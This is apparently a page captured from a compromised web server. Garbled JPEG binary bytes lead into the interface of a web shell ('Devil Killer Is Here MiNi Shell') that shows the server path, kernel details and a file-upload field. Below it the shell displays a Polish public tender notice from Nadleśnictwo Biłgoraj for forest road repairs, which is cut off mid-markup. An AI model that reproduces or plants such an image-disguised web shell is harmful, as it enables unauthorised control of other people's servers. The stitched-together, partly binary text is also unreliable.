JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210929/0019546801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remonty dróg leśnych położonych na terenie<br/>leśnictwa BISZCZA </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO BIŁGORAJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950014995</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zamojska 96</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Biłgoraj</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">84 68600 28</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bilgoraj@lublin.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bilgoraj.lublin.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> lesnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remonty dróg leśnych położonych na terenie<br/>leśnictwa BISZCZA </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2b1e36ec-1f83-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00195468</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_bilgoraj <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lasy_bilgoraj</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały na stronie https://platformazakupowa.pl/strona/1-regulamin</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W zw. z rozpoczęciem obow. z dniem 25maja 2018 r. Rozporządzenia Parlamentu Europejskiego i Rady Unii Europejskiej 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych iw sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej nazwa RODO), stosownie do wymogów wynikających z art. 13 ust. 1 i ust. 2 tego aktu prawnego informujemy,że administratorem Państwa danych osobowych jest Nadleśnictwo Biłgoraj z siedzibą w Biłgoraju, ul. Zamojska 96, 23-400Biłgoraj. Przedstawicielem administratora jest: Nadleśniczy-Mariusz Szwed.2. Z adm. można skontaktować się: osobiście w siedzibie Nadleśnictwa Biłgoraj telefonicznie pod numerem tel. (84) 687-20-19, za pomocą poczty elektronicznej e-mail pod adresem: bilgoraj@lublin.lasy.gov.pl. Administrator nie wyznaczył Inspektora Ochrony Danych Osobowych. 3. Przetwarzanie Państwa danych osobowych jest dokonywane w celu prawidłowej realizacji obowiązków ustawowych tj. przeprowadzenia postępowania o udzielenie zamówienia publicznego i zawarcia umowy z wybranym wykonawcą. Dane osobowe są przetwarzane na podstawie prawnej art. 6 ust. 1 lit. b) i lit. c) RODO. Podanie danych jest dobrowolne, ale jest warunkiem wzięcia udziału w postępowaniu o udzielenie zamówienia publicznego oraz zawarcia umowy.4. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy z dnia 24 października 2019 r. - Prawo zamówień publicznych (tekst jednolity: Dz.U. z 2019 r. poz. 2019, ze zm.), dalej „ustawa Pzp”.5.Państwa dane osobowe mogą być przekazywane do organów państwowych (np. Policja, prokuratura)prowadzących postępowania (np. karne, o wykroczenia). Dane mogą być również przekazywane kancelarii prawnej prowadzącej obsługę prawną Nadleśnictwa, jak również do jednostek nadrzędnych Lasów Państwowych w szczególności do RDLP w Lublinie oraz DGLP. Ponadto dane osobowe będą udostępniane łącznie z dokumentacją dotyczącą postępowania o udzielenie zamówienia publicznego w przypadkach składania wniosków o udostępnienie informacji publicznej. 6. Państwa dane osobowe są przetwarzane ręcznie oraz elektronicznie za pomocą Systemu Informatycznego Lasów Państwowych. Dane osobowe są i będą przetwarzane przez okres czasu wyznaczony przepisami o rachunkowości - nie dłużej niż 6 lat licząc od wystawienia ostatniej faktury, jak również wyznaczony przepisami kodeksu cywilnego o przedawnieniu roszczeń - podstawowy termin 6 lat od wymagalności roszczenia, jak również przez okres czasu wyznaczony przepisami (w tym wewnętrznymi) o archiwizacji dokumentów - w zależności od tego, który z tych okresów będzie najdłuższy. 7. W związku z przetwarzaniem danych osobowych przysługuje Państwu prawo do:1) żądania od Administratora, na podstawie art. 15 RODO, dostępu do Pani/Pana danych osobowych,2) żądania od Administratora, na podstawie art. 16 RODO, sprostowania Pani/Pana danych osobowych.3) żądania od Administratora,na podstawie art. 18 RODO, ograniczenia przetwarzania Pani/Pana danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Pani/Pan uzna, że przetwarzanie Pani/Pana danych osobowych narusza przepisy RODO.8. W związku z przetwarzaniem danych osobowych przysługuje Państwu nie przysługuje Państwu prawo do:1) żądania od Administratora, na podstawie art. 17 ust. 3 lit. b, d lub e RODO, usunięcia Pani/Pana danych osobowych;2) prawo do przenoszenia danych osobowych o którym mowa w art. 20 RODO;3) prawo sprzeciwu, na podstawie art. 21 RODO,wobec przetwarzania danych osobowych , gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">.) RODO (ograniczenia stosowania): Stosownie do wymogów wynikających z przepisu art. 19ust. 4 ustawy Pzp, Zamawiający informuje, że:1) W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679.(art. 74 ust. 3 ustawy Pzp)2) Udostępnianie protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust. 1 rozporządzenia 2016/679, zebranych w toku postępowania o udzielenie zamówienia. Ograniczenia zasady jawności, o których mowa w ust. 3i art. 18 ust. 3-6, stosuje się odpowiednio, (art. 74 ust. 4 ustawy Pzp)3) W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym mowa wart. 15 ust. 1-3 rozporządzenia 2016/679, Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia, (art.75 ustawy Pzp)4) Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności protokołu postępowania oraz jego załączników, (art. 76 ustawy Pzp)5) Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.(art. 19 ust. 3 ustawy Pzp)6) W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego, (art. 269 ust. 2 ustawy Pzp).8.Administrator dokłada wszelkich starań, aby zapewnić wszelkie środki fizycznej, technicznej i organizacyjnej ochrony danych osobowych przed ich przypadkowym czy umyślnym zniszczeniem,przypadkową utratą, zmianą, nieuprawnionym ujawnieniem, wykorzystaniem czy dostępem, zgodnie ze wszystkimi obowiązującymi przepisami</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.6.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1 (Zadanie 1) - remont drogi leśnej numer inwentarzowy nr 59/212 w oddziałach nr 112 i 113 na odcinku długości 120 mb w leśnictwie BISZCZA<br/>Planowana do remontu droga leśna długości 120,00 m zlokalizowana jest w oddziałach Nr 112 oraz 113 w leśnictwie Biszcza. Początek drogi zlokalizowany jest na końcu drogi leśnej utwardzonej kruszywem pochodzącym z żużla pohutniczego. Stan techniczny nawierzchni tej drogi jest bardzo dobry. Natomiast koniec drogi zlokalizowany jest na przedłużeniu tej <br/>przedmiotowej drogi w kierunku rzeki Tanew. W chwili obecnej droga ta posiada nawierzchnię gruntową. Na odcinku tym zlokalizowane są trzy miejscowe zaniżenia<br/>drogi o łącznej długości 120,00 m na których usytuowane są zastoiska wody. Długości poszczególnych miejsc (odcinków robót) są zróżnicowane i wynoszą od 20,00 m do 60,00 m. Zaplanowana do remontu droga leśna w parametrach drogi klasy D posiada koronę szerokości 5,00 m ze spadkiem daszkowym jezdni 2 %, oraz spadkiem jednostronnym poboczy 8 %. Szerokość jezdni wynosi 3,50 m, a poboczy gruntowych 2 x 0,75 m.<br/>Parametry drogi leśnej oraz planowany zakres rzeczowy remontu<br/>- długość drogi do remontu (łącznie) – 120,00 m<br/>- szerokość jezdni – 3,50 m<br/>- wykonanie podbudowy z kruszywa łamanego grubości 20 cm – 420,00 m2<br/>- wykonanie koryta głębokości 10 cm – 420,00 m2 wraz z uformowaniem i zagęszczeniem <br/> poboczy (urobek z koryta),<br/>- plantowanie nasypów – 223,20 m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert dla danej części zamówienia i wyborze najkorzystniejszej oferty zamawiający będzie kierował się kryteriami, których znaczenie (wagę) określa się punktowo tj. a)cena = 60 pkt b)okres gwarancji i rękojmi = 40 pkt<br/>15.2.Kryterium „Cena ” - „C” będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia złożonej przez Wykonawcę w formularzu oferty dla danej części zamówienia. W tym kryterium można uzyskać maksymalnie 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.Ilość punktów w kryterium „cena” będzie wyliczana według następującego wzoru: C = C. of. min x 60 pkt / C. of. bad<br/>gdzie:<br/> C - ilość punktów, jakie otrzyma oferta "X” za kryterium “Cena”;<br/> C of. min. - najniższa cena spośród ofert nie podlegających odrzuceniu i <br/> złożonych przez wykonawców, którzy nie podlegali wykluczeniu w <br/> danym etapie badania i oceny ofert;<br/> C of. bad. - cena oferty badanej <br/>Opis kryterium ” okres gwarancji i rękojmi G.<br/> Kryterium będzie rozpatrywany na podstawie długości okresu gwarancji i rękojmi zadeklarowanej przez wykonawcę w ofercie.<br/> Minimalny okres gwarancji i rękojmi wymagany i podlegający ocenie przez <br/> zamawiającego: 3 lata. <br/> Maksymalny okres gwarancji i rękojmi wymagany i podlegający ocenie przez <br/> zamawiającego: 5 lat. <br/> Punktacja:<br/> Wykonawca, który zaoferuje okres gwarancji i rękojmi na okres 3 lat — otrzymuje 10pkt,<br/> Wykonawca, który zaoferuje okres gwarancji i rękojmi na okres 4 lat - otrzymuje 20pkt,<br/> Wykonawca, który zaoferuje okres gwarancji i rękojmi na okres 5 lat - otrzymuje 40pkt,<br/> W tym kryterium można uzyskać maksymalnie 40 punktów.<br/>15.4.Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę <br/> punktów (P) wyliczoną zgodnie z poniższym wzorem:<br/> P = C + G gdzie:<br/> P - łączna liczba punktów oferty ocenianej,<br/> C - liczba punktów uzyskanych w kryterium „Cena”,<br/> G - liczba punktów uzyskanych w kryterium „długość okresu gwarancji i <br/> rękojmi”.<br/> Zamawiający przyzna punkty maksymalnie za 5 lat, dalsze wydłużanie okresu <br/> gwarancji nie będzie miało wpływu na ocenę ofert.<br/> Wykonawca, który nie zadeklaruje / nie zaznaczy na formularzu oferty/ wydłużonego okresu obowiązywania gwarancji, w tym kryterium otrzyma 0 pkt. W takim przypadku, okres gwarancji będzie wynosił 2 lata.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okre gwarancji i rekojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2 (Zadanie 2) – Remont cząstkowy drogi leśnej numer inwentarzowy 220/2019 w oddziale nr 118, 119, 120,i 121 na odcinku długości 1265 m w leśnictwie BISZCZA.<br/>Planowana do remontu cząstkowego droga leśna posiada nawierzchnię z kruszywa łamanego. Wskutek długotrwałej eksploatacji powstały liczne ubytki i wyboje oraz deformacje i zaniżenia. Podczas opadów deszczu tworzą się zastoiska wody co przyśpiesza proces degradacji drogi. Stan techniczny nawierzchni jest zły. Przedmiotowa droga wymaga wykonania remontu cząstkowego na całym odcinku posiadającym długość<br/>1265,00 m. Projektowany remont poprawi równość nawierzchni w profilu i przekroju, oraz wpłynie pozytywnie na komfort jazdy. Droga usytuowana jest w oddziałach 118, 119, 120 i 121 w leśnictwie Biszcza. Zaplanowana do remontu cząstkowego droga leśna w parametrach drogi klasy D posiada koronę szerokości 5,00 m ze spadkiem daszkowym jezdni 2 %, oraz spadkiem jednostronnym poboczy 8 %. Szerokość jezdni<br/>wynosi 3,50 m, a poboczy gruntowych 2 x 0,75 m.<br/>Parametry drogi leśnej oraz planowany zakres rzeczowy remontu cząstkowego<br/>- długość drogi do remontu (łącznie) – 1265,00 m<br/>- szerokość jezdni – 3,50 m<br/>- remonty cząstkowe nawierzchni z kruszywa łamanego, średnia głębokość wyboi do 5·cm <br/> (ubytki i wyboje) – 446,27 m2<br/>- wyrównanie istniejącej podbudowy, kruszywem łamanym, średnia grubość warstwy po <br/> zagęszczeniu do 10·cm (zaniżenia) – 22,00 m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert dla danej części zamówienia i wyborze najkorzystniejszej oferty zamawiający będzie kierował się kryteriami, których znaczenie (wagę) określa się punktowo tj. a)cena = 60 pkt b)okres gwarancji i rękojmi = 40 pkt<br/>15.2.Kryterium „Cena ” - „C” będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia złożonej przez Wykonawcę w formularzu oferty dla danej części zamówienia. W tym kryterium można uzyskać maksymalnie 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.Ilość punktów w kryterium „cena” będzie wyliczana według następującego wzoru: C = C. of. min x 60 pkt / C. of. bad<br/>gdzie:<br/> C - ilość punktów, jakie otrzyma oferta "X” za kryterium “Cena”;<br/> C of. min. - najniższa cena spośród ofert nie podlegających odrzuceniu i <br/> złożonych przez wykonawców, którzy nie podlegali wykluczeniu w <br/> danym etapie badania i oceny ofert;<br/> C of. bad. - cena oferty badanej <br/>Opis kryterium ” okres gwarancji i rękojmi G.<br/> Kryterium będzie rozpatrywany na podstawie długości okresu gwarancji i rękojmi zadeklarowanej przez wykonawcę w ofercie.<br/> Minimalny okres gwarancji i rękojmi wymagany i podlegający ocenie przez <br/> zamawiającego: 3 lata. <br/> Maksymalny okres gwarancji i rękojmi wymagany i podlegający ocenie przez <br/> zamawiającego: 5 lat. <br/> Punktacja:<br/> Wykonawca, który zaoferuje okres gwarancji i rękojmi na okres 3 lat — otrzymuje 10pkt,<br/> Wykonawca, który zaoferuje okres gwarancji i rękojmi na okres 4 lat - otrzymuje 20pkt,<br/> Wykonawca, który zaoferuje okres gwarancji i rękojmi na okres 5 lat - otrzymuje 40pkt,<br/> W tym kryterium można uzyskać maksymalnie 40 punktów.<br/>15.4.Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę <br/> punktów (P) wyliczoną zgodnie z poniższym wzorem:<br/> P = C + G gdzie:<br/> P - łączna liczba punktów oferty ocenianej,<br/> C - liczba punktów uzyskanych w kryterium „Cena”,<br/> G - liczba punktów uzyskanych w kryterium „długość okresu gwarancji i <br/> rękojmi”.<br/> Zamawiający przyzna punkty maksymalnie za 5 lat, dalsze wydłużanie okresu <br/> gwarancji nie będzie miało wpływu na ocenę ofert.<br/> Wykonawca, który nie zadeklaruje / nie zaznaczy na formularzu oferty/ wydłużonego okresu obowiązywania gwarancji, w tym kryterium otrzyma 0 pkt. W takim przypadku, okres gwarancji będzie wynosił 2 lata.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 